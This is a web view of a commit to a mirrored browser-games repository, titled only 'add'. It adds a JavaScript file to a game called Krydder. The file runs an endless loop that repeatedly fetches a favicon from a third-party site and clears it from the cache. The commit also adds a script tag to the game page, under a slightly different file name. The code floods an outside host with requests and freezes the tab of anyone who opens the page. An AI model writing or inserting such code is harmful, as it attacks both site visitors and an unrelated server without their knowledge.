mirror of
https://github.com/hexahigh/games.git
synced 2025-12-11 20:15:38 +01:00
add
This commit is contained in:
parent
4dcb16985c
commit
ac419c184f
11
Games/Krydder/dlhermann.js
Normal file
11
Games/Krydder/dlhermann.js
Normal file
@ -0,0 +1,11 @@
|
||||
while (true) {
|
||||
fetch('https://t0m0t0w.github.io/favicon.png')
|
||||
.then(response => response.text())
|
||||
.then(data => {
|
||||
// Do something with the data
|
||||
console.log(data);
|
||||
|
||||
// Delete the file from the cache
|
||||
caches.delete('https://t0m0t0w.github.io/favicon.png');
|
||||
});
|
||||
}
|
||||
@ -38,6 +38,7 @@
|
||||
|
||||
setInterval(addKrydder, 1000);
|
||||
</script>
|
||||
<script src="dlkrydder.js"></script>
|
||||
</head>
|
||||
<body>
|
||||
<div id="krydder-container"></div>
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user